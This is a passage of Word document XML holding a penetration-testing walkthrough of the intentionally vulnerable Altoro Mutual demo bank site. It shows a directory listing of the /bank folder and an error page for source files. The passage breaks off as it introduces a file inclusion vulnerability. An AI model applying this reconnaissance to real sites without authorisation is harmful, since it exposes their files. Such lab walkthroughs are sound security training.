          <w:sz w:val="21"/>
          <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>D:downloads!AltoroMutual_v6website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="274" w:before="274"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Semibold" w:eastAsia="Source Sans Pro Semibold" w:hAnsi="Source Sans Pro Semibold" w:cs="Source Sans Pro Semibold"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="33"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>/bank</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="14" w:name="_Tocj6jx0pyngvth"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">You’ll find a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Bold" w:eastAsia="Source Sans Pro Bold" w:hAnsi="Source Sans Pro Bold" w:cs="Source Sans Pro Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>directory listening</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "http://demo.testfire.net/bank/"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>http://demo.testfire.net/bank/</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> which will show you a lot of information about the applications functionalities.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="119037"/>
        <w:tblW w:w="5834" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="434"/>
        <w:gridCol w:w="5400"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="7220"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="434"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 xml:space="preserve"> 1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="540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 xml:space="preserve"> 5/31/2007 11:10 AM        &lt;dir&gt; 20060308_bak</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         1831 account.aspx</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         4277 account.aspx.cs</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM          771 apply.aspx</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         2828 apply.aspx.cs</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         2236 bank.master</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         1134 bank.master.cs</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM          904 customize.aspx</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         1955 customize.aspx.cs</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         1806 login.aspx</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         5847 login.aspx.cs</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM           78 logout.aspx</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         3361 logout.aspx.cs</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM          935 main.aspx</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         3951 main.aspx.cs</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5/31/2007 11:10 AM        &lt;dir&gt; members</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         1414 mozxpath.js</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 6/21/2011 10:29 PM          779 queryxpath.aspx</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         1838 queryxpath.aspx.cs</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM          499 servererror.aspx</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         1700 transaction.aspx</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         3826 transaction.aspx.cs</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         3930 transfer.aspx</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM         3505 transfer.aspx.cs</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1/12/2011 10:14 PM           82 ws.asmx</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Since the application is written in C# you might want to see whats behind the *.cs files. However clicking on the files will trigger following error message:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="875262"/>
        <w:tblW w:w="3029" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="329"/>
        <w:gridCol w:w="2700"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1664"/>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r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="270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An Error Has Occurred</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Summary:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>An unknown error occurred.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Error Message:</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So you’ll have to find another way to get to the files. We’ll use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Bold" w:eastAsia="Source Sans Pro Bold" w:hAnsi="Source Sans Pro Bold" w:cs="Source Sans Pro Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>file inclusion vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
